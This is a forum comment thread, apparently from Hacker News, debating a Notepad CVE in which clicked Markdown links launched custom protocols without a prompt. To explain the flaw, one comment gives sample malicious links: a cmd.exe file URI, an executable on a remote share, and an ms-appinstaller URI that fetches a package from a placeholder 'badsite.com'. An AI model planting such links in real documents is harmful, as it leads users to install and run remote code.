← Back to context

Comment by NetMageSCW

21 hours ago

Except memory-unsafe and fringe features have nothing to do with this CVE, which seems incredibly dumb on the face of it.

Replace Notepad with Chrome or Edge - clicking on a link downloads content from the Internet! Oh noes!

3 comments

NetMageSCW

Reply
paleotrope  8 hours ago

I haven't had time to look at it in detail but surely the vulnerability is more than a "click a URL".

  • amiga386  7 hours ago

    No, that's exactly what the vulnerability is as far as I know.

    "An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files." https://msrc.microsoft.com/update-guide/vulnerability/CVE-20...

    Imagine some Markdown:

        [link](https://badsite.com)
    [link](file://C:/windows/system32/cmd.exe)
    [link](file://\\1.2.3.4\share\foo.exe)
    [link](ms-appinstaller://?source=https://badsite.com/bad.appx)

    Wordpad, Notepad++ and many others highlight and let you double-click the URL in the first three lines, and yes they use the shell to open cmd.exe, yes they open remote shares (which if they're properly remote, the shell throws up a warning prompt asking if you want to connect). Wordpad always prompts if you want to open the link (and shows the link) before doing it, but you can click "Yes".

    What's beyond the pale is that MS's new Notepad highlighted custom URIs like the fourth link, and let you click to open it without a prompt. Even web browsers will prompt at least once with a special modal dialogue, the first time you click on a link to a custom URI. For safety, a text editor should stick to highlighting http/https/file URIs only.

    That's the "RCE", in the same way that telling a Linux user to type "curl | sudo bash" in their shell is "RCE".

    The fix is that clicking the link now gives a dialogue box asking if you really want to click it, and remember to click no if you're not sure.

    • ziml77  2 hours ago

      I wish they made this clearer as being the issue. It's what it came across to me like, but I couldn't actually say for sure that's what they meant because the CVE pages didn't make it obvious. And the comments here didn't help because everyone is just complaining about feature creep rather than discussing the actual problem.

      Anyway, what this now has me thinking is, should protecting against this be expected to be done per-app or should it be at the OS level? It seems like it would make more sense to have the OS keep records on what application is allowed to open what kinds of links. Maybe with some mechanism to allow the app to cooperate with the OS if they want finer-grained permissions (such as a chat app passing the poster's user ID to the OS when invoking the link, so you could set an 'always allow' rule for links from specific users rather than the full app).